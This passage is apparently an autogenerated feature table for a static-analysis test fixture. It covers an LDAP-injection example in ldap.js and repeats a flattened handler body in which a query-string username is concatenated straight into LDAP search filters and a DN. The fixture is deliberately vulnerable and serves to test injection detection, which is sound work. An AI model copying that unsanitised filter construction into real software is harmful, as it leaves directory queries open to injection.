parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:7:59:4 | f = new ... ],\\n }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:7:59:4 | f = new ... ],\\n }) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:11:59:4 | exceptional return of new OrF ... ],\\n }) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:11:59:4 | exceptional return of new OrF ... ],\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:11:59:4 | exceptional return of new OrF ... ],\\n }) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:11:59:4 | exceptional return of new OrF ... ],\\n }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:11:59:4 | exceptional return of new OrF ... ],\\n }) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:11:59:4 | new OrF ... ],\\n }) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:11:59:4 | new OrF ... ],\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:11:59:4 | new OrF ... ],\\n }) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:11:59:4 | new OrF ... ],\\n }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:11:59:4 | new OrF ... ],\\n }) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:15:48:22 | OrFilter | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:15:48:22 | OrFilter | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:15:48:22 | OrFilter | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:15:48:22 | OrFilter | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:15:48:22 | OrFilter | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:24:59:3 | {\\n f ... ],\\n } | CalleeFlexibleAccessPath | OrFilter | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:24:59:3 | {\\n f ... ],\\n } | InputArgumentIndex | 0 | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:24:59:3 | {\\n f ... ],\\n } | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:24:59:3 | {\\n f ... ],\\n } | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:24:59:3 | {\\n f ... ],\\n } | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:24:59:3 | {\\n f ... ],\\n } | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:48:24:59:3 | {\\n f ... ],\\n } | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:5:49:11 | filters | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:5:49:11 | filters | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:5:49:11 | filters | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:5:49:11 | filters | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:5:49:11 | filters | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:5:58:5 | filters ... ,\\n ] | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:5:58:5 | filters ... ,\\n ] | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:5:58:5 | filters ... ,\\n ] | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:5:58:5 | filters ... ,\\n ] | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:5:58:5 | filters ... ,\\n ] | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:5:58:5 | filters ... ,\\n ] | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:5:58:5 | filters ... ,\\n ] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:5:58:5 | filters ... ,\\n ] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:5:58:5 | filters ... ,\\n ] | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:5:58:5 | filters ... ,\\n ] | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:14:58:5 | [\\n ... ,\\n ] | CalleeFlexibleAccessPath | OrFilter | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:14:58:5 | [\\n ... ,\\n ] | InputAccessPathFromCallee | ?.filters | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:14:58:5 | [\\n ... ,\\n ] | InputArgumentIndex | 0 | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:14:58:5 | [\\n ... ,\\n ] | assignedToPropName | filters | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:14:58:5 | [\\n ... ,\\n ] | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:14:58:5 | [\\n ... ,\\n ] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:14:58:5 | [\\n ... ,\\n ] | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:14:58:5 | [\\n ... ,\\n ] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:49:14:58:5 | [\\n ... ,\\n ] | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:7:53:8 | exceptional return of new Equ ... }) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:7:53:8 | exceptional return of new Equ ... }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:7:53:8 | exceptional return of new Equ ... }) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:7:53:8 | exceptional return of new Equ ... }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:7:53:8 | exceptional return of new Equ ... }) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:7:53:8 | new Equ ... }) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:7:53:8 | new Equ ... }) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:7:53:8 | new Equ ... }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:7:53:8 | new Equ ... }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:7:53:8 | new Equ ... }) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:7:53:8 | new Equ ... }) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:7:53:8 | new Equ ... }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:7:53:8 | new Equ ... }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:7:53:8 | new Equ ... }) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:7:53:8 | new Equ ... }) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:11:50:24 | EqualityFilter | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:11:50:24 | EqualityFilter | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:11:50:24 | EqualityFilter | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:11:50:24 | EqualityFilter | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:11:50:24 | EqualityFilter | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:26:53:7 | {\\n ... } | CalleeFlexibleAccessPath | EqualityFilter | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:26:53:7 | {\\n ... } | InputArgumentIndex | 0 | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:26:53:7 | {\\n ... } | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:26:53:7 | {\\n ... } | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:26:53:7 | {\\n ... } | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:26:53:7 | {\\n ... } | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:50:26:53:7 | {\\n ... } | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:9:51:17 | attribute | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:9:51:17 | attribute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:9:51:17 | attribute | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:9:51:17 | attribute | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:9:51:17 | attribute | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:9:51:25 | attribute: "name" | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:9:51:25 | attribute: "name" | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:9:51:25 | attribute: "name" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:9:51:25 | attribute: "name" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:9:51:25 | attribute: "name" | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:9:51:25 | attribute: "name" | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:9:51:25 | attribute: "name" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:9:51:25 | attribute: "name" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:9:51:25 | attribute: "name" | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:9:51:25 | attribute: "name" | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:20:51:25 | "name" | CalleeFlexibleAccessPath | EqualityFilter | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:20:51:25 | "name" | InputAccessPathFromCallee | ?.attribute | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:20:51:25 | "name" | InputArgumentIndex | 0 | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:20:51:25 | "name" | assignedToPropName | attribute | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:20:51:25 | "name" | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:20:51:25 | "name" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:20:51:25 | "name" | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:20:51:25 | "name" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:51:20:51:25 | "name" | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:9:52:13 | value | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:9:52:13 | value | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:9:52:13 | value | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:9:52:13 | value | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:9:52:13 | value | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:9:52:23 | value: username | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:9:52:23 | value: username | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:9:52:23 | value: username | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:9:52:23 | value: username | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:9:52:23 | value: username | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:9:52:23 | value: username | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:9:52:23 | value: username | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:9:52:23 | value: username | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:9:52:23 | value: username | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:9:52:23 | value: username | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:16:52:23 | username | CalleeFlexibleAccessPath | EqualityFilter | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:16:52:23 | username | InputAccessPathFromCallee | ?.value | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:16:52:23 | username | InputArgumentIndex | 0 | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:16:52:23 | username | assignedToPropName | value | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:16:52:23 | username | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:16:52:23 | username | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:16:52:23 | username | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:16:52:23 | username | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:52:16:52:23 | username | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:7:57:8 | exceptional return of new Equ ... }) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:7:57:8 | exceptional return of new Equ ... }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:7:57:8 | exceptional return of new Equ ... }) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:7:57:8 | exceptional return of new Equ ... }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:7:57:8 | exceptional return of new Equ ... }) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:7:57:8 | new Equ ... }) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:7:57:8 | new Equ ... }) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:7:57:8 | new Equ ... }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:7:57:8 | new Equ ... }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:7:57:8 | new Equ ... }) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:7:57:8 | new Equ ... }) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:7:57:8 | new Equ ... }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:7:57:8 | new Equ ... }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:7:57:8 | new Equ ... }) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:7:57:8 | new Equ ... }) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:11:54:24 | EqualityFilter | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:11:54:24 | EqualityFilter | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:11:54:24 | EqualityFilter | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:11:54:24 | EqualityFilter | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:11:54:24 | EqualityFilter | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:26:57:7 | {\\n ... } | CalleeFlexibleAccessPath | EqualityFilter | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:26:57:7 | {\\n ... } | InputArgumentIndex | 0 | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:26:57:7 | {\\n ... } | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:26:57:7 | {\\n ... } | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:26:57:7 